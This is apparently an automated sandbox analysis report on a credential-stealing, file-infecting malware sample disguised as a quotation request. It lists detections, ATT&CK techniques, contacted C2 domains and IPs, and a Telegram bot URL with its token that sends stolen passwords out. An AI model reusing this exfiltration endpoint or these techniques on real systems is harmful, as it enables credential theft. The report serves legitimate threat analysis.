              Source: Yara matchFile source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeBinary or memory string: WIN_81
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeBinary or memory string: WIN_XP
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeBinary or memory string: WIN_XPe
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeBinary or memory string: WIN_VISTA
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeBinary or memory string: WIN_7
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeBinary or memory string: WIN_8
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
              Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTR
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeCode function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts
              12
              Native API
              1
              LSASS Driver
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              1
              OS Credential Dumping
              12
              System Time Discovery
              1
              Taint Shared Content
              11
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Service Execution
              1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              11
              Deobfuscate/Decode Files or Information
              121
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              2
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts
              1
              LSASS Driver
              1
              Abuse Elevation Control Mechanism
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Windows Service
              1
              DLL Side-Loading
              3
              Obfuscated Files or Information
              NTDS127
              System Information Discovery
              Distributed Component Object Model121
              Input Capture
              3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
              Valid Accounts
              1
              Software Packing
              LSA Secrets341
              Security Software Discovery
              SSH3
              Clipboard Data
              14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
              Access Token Manipulation
              1
              Timestomp
              Cached Domain Credentials21
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
              Windows Service
              1
              DLL Side-Loading
              DCSync2
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job212
              Process Injection
              1
              File Deletion
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
              Masquerading
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
              Valid Accounts
              Network Sniffing1
              System Network Configuration Discovery
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
              Virtualization/Sandbox Evasion
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task21
              Access Token Manipulation
              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers212
              Process Injection
              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576074 Sample: REQUEST FOR QUOTATION 1307-... Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 36 reallyfreegeoip.org 2->36 38 api.telegram.org 2->38 40 24 other IPs or domains 2->40 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 64 15 other signatures 2->64 7 armsvc.exe 1 2->7         started        12 REQUEST FOR QUOTATION 1307-RFQ.exe 5 2->12         started        14 elevation_service.exe 2->14         started        16 15 other processes 2->16 signatures3 60 Tries to detect the country of the analysis system (by using the IP) 36->60 62 Uses the Telegram API (likely for C&C communication) 38->62 process4 dnsIp5 48 ww99.fwiwk.biz 72.52.179.174, 49738, 49897, 80 LIQUIDWEBUS United States 7->48 50 lpuegx.biz 82.112.184.197, 49745, 49748, 49766 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 7->50 52 8 other IPs or domains 7->52 22 C:\Windows\System32\wbengine.exe, PE32+ 7->22 dropped 24 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 7->24 dropped 26 C:\Windows\System32\vds.exe, PE32+ 7->26 dropped 34 138 other malicious files 7->34 dropped 70 Drops executable to a common third party application directory 7->70 72 Infects executable files (exe, dll, sys, html) 7->72 28 C:\Windows\System32\alg.exe, PE32+ 12->28 dropped 30 C:\Windows\System32\AppVClient.exe, PE32+ 12->30 dropped 32 C:\Program Files (x86)\...\armsvc.exe, PE32 12->32 dropped 74 Binary is likely a compiled AutoIt script file 12->74 76 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->76 78 Writes to foreign memory regions 12->78 80 Maps a DLL or memory area into another process 12->80 18 RegSvcs.exe 15 2 12->18         started        82 Found direct / indirect Syscall (likely to bypass EDR) 14->82 84 Creates files inside the volume driver (system volume information) 16->84 86 Contains functionality to behave differently if execute on a Russian/Kazak computer 16->86 file6 signatures7 process8 dnsIp9 42 api.telegram.org 149.154.167.220, 443, 49737 TELEGRAMRU United Kingdom 18->42 44 checkip.dyndns.com 158.101.44.242, 49731, 80 ORACLE-BMC-31898US United States 18->44 46 reallyfreegeoip.org 172.67.177.134, 443, 49732 CLOUDFLARENETUS United States 18->46 66 Tries to steal Mail credentials (via file / registry access) 18->66 68 Tries to harvest and steal browser information (history, passwords, etc) 18->68 signatures10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              REQUEST FOR QUOTATION 1307-RFQ.exe82%ReversingLabsWin32.Virus.Expiro
              REQUEST FOR QUOTATION 1307-RFQ.exe100%AviraW32/Infector.Gen
              REQUEST FOR QUOTATION 1307-RFQ.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
              C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
              C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              przvgke.biz
              172.234.222.138
              truefalse
                high
                76899.bodis.com
                199.59.243.227
                truefalse
                  high
                  ssbzmoy.biz
                  18.141.10.107
                  truefalse
                    high
                    knjghuig.biz
                    18.141.10.107
                    truefalse
                      high
                      vjaxhpbji.biz
                      82.112.184.197
                      truefalse
                        high
                        pywolwnvd.biz
                        54.244.188.177
                        truefalse
                          high
                          reallyfreegeoip.org
                          172.67.177.134
                          truefalse
                            high
                            ifsaia.biz
                            13.251.16.150
                            truefalse
                              high
                              checkip.dyndns.com
                              158.101.44.242
                              truefalse
                                high
                                cvgrf.biz
                                54.244.188.177
                                truefalse
                                  high
                                  ww99.przvgke.biz
                                  72.52.179.174
                                  truefalse
                                    high
                                    lpuegx.biz
                                    82.112.184.197
                                    truefalse
                                      high
                                      ww99.fwiwk.biz
                                      72.52.179.174
                                      truefalse
                                        unknown
                                        saytjshyf.biz
                                        44.221.84.105
                                        truefalse
                                          high
                                          084725.parkingcrew.net
                                          76.223.26.96
                                          truefalse
                                            high
                                            xlfhhhm.biz
                                            47.129.31.212
                                            truefalse
                                              high
                                              fwiwk.biz
                                              172.234.222.143
                                              truefalse
                                                high
                                                vcddkls.biz
                                                18.141.10.107
                                                truefalse
                                                  high
                                                  npukfztj.biz
                                                  44.221.84.105
                                                  truefalse
                                                    high
                                                    api.telegram.org
                                                    149.154.167.220
                                                    truefalse
                                                      high
                                                      ww7.fwiwk.biz
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        zlenh.biz
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          checkip.dyndns.org
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            uhxqin.biz
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              ww12.przvgke.biz
                                                              unknown
                                                              unknowntrue
                                                                unknown
                                                                anpmnmxo.biz
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  NameMaliciousAntivirus DetectionReputation
                                                                  http://przvgke.biz/vuoxfalse
                                                                    https://reallyfreegeoip.org/xml/8.46.123.189false
                                                                      http://saytjshyf.biz/xoqfqirqhpfalse
                                                                        http://ifsaia.biz/mmbextsivoeuyvttfalse
                                                                          https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189true
                                                                            http://knjghuig.biz/sjqomgqqkfalse
                                                                              http://vjaxhpbji.biz/vtrue
                                                                                http://vjaxhpbji.biz/tcmuebmfxhujtrue
                                                                                  http://checkip.dyndns.org/false
                                                                                    http://lpuegx.biz/rdnhtrue
                                                                                      http://ssbzmoy.biz/ndknjifalse
                                                                                        http://cvgrf.biz/dytrue
                                                                                          http://pywolwnvd.biz/vaytstrue
                                                                                            http://fwiwk.biz/wxalwqnfalse
                                                                                              http://xlfhhhm.biz/jsoiayboaqefalse
                                                                                                http://przvgke.biz/asgidloooxieajffalse
                                                                                                  http://vcddkls.biz/kknpblsbxdrrjkofalse
                                                                                                    http://npukfztj.biz/unfalse
                                                                                                      http://lpuegx.biz/attrue
                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                        http://44.221.84.105/Iarmsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          http://ww12.przvgke.bize4-4079-b30a-7368302a1ad4harmsvc.exe, 00000001.00000003.1840324999.0000000000737000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000735000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            https://crbug.com/820996LaunchElevatedProcessdisable-best-effort-tasksdisable-breakpaddisable-featurAcrobat.exe.1.drfalse
                                                                                                              https://reallyfreegeoip.org/xml/8.46.123.189=4RegSvcs.exe, 00000002.00000002.2961862883.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                http://ww99.przvgke.biz/armsvc.exefalse
                                                                                                                  https://api.telegram.orgRegSvcs.exe, 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                    https://api.telegram.org/botRegSvcs.exe, 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                      http://82.112.184.197/atharmsvc.exe, 00000001.00000003.2334989969.0000000000720000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        http://44.221.84.105/unjarmsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          https://api.telegram.org/bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839RegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            http://18.141.10.107/Narmsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://44.221.84.105/3armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://crbug.com/820996Acrobat.exe.1.drfalse
                                                                                                                                  http://54.244.188.177/vaytsREQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1684737431.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1685750618.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1723140950.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    http://18.141.10.107/armsvc.exe, 00000001.00000003.1723140950.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      http://82.112.184.197/varmsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        http://82.112.184.197/Garmsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          http://ww99.przvgke.biz/asgidloooxieajfarmsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilithnotification_click_helper.exe.1.drfalse
                                                                                                                                              http://ww12.przvgke.biz/asgidloooxieajf?usid=25&utid=8251792691LocationETagAuthentication-InfoAgeAccarmsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839586338.0000000000757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                http://172.234.222.138/asgidloooxieajfNarmsvc.exe, 00000001.00000003.1840081813.000000000071F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://checkip.dyndns.org/qREQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                    https://api.telegramRegSvcs.exe, 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                      http://172.234.222.138/armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://www.autoitscript.com/autoit3/8Au3Info_x64.exe.1.drfalse
                                                                                                                                                          http://82.112.184.197/rdnharmsvc.exe, 00000001.00000003.2101953987.0000000000735000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.000000000071F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2102549025.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.2961862883.0000000002A31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://www.autoitscript.com/site/autoit/8AutoIt3Help.exe.1.drfalse
                                                                                                                                                                http://54.244.188.177/armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1700090715.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://172.234.222.138/asgidloooxieajf:armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://reallyfreegeoip.org/xml/REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzYwMjZjODc4armsvc.exe, 00000001.00000003.1821807650.0000000002330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://ww12.przvgke.biz/asgidloooxieajf?usid=25&utid=8251792691armsvc.exe, 00000001.00000003.1839091419.0000000000762000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839091419.000000000074B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1839586338.0000000000757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://44.221.84.105/unarmsvc.exe, 00000001.00000003.1764341618.0000000000720000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
